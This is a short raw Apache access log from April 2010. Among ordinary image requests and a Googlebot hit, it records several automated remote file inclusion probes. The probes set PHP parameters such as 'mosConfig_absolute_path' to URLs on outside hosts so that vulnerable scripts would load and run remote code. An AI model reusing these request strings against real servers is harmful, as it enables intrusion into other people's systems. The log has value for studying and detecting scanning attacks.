67.222.152.66 - - [16/Apr/2010:00:54:05 -0400] "GET /logs/access_log.Q110030500%20%20//index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:54:06 -0400] "GET /logs/access_log.Q110030500%20%20//index2.php?mosConfig_absolute_path=http://ezt.cz/css/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:00:55:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA2334D503406E8005E0309Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.133.122.210 - - [16/Apr/2010:00:57:13 -0400] "GET /logs/access_log.Q109081500//mp3/velid3/module.archive.gzip.php?determined_format[include]=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
68.82.245.162 - - [16/Apr/2010:00:57:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
68.82.245.162 - - [16/Apr/2010:00:57:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
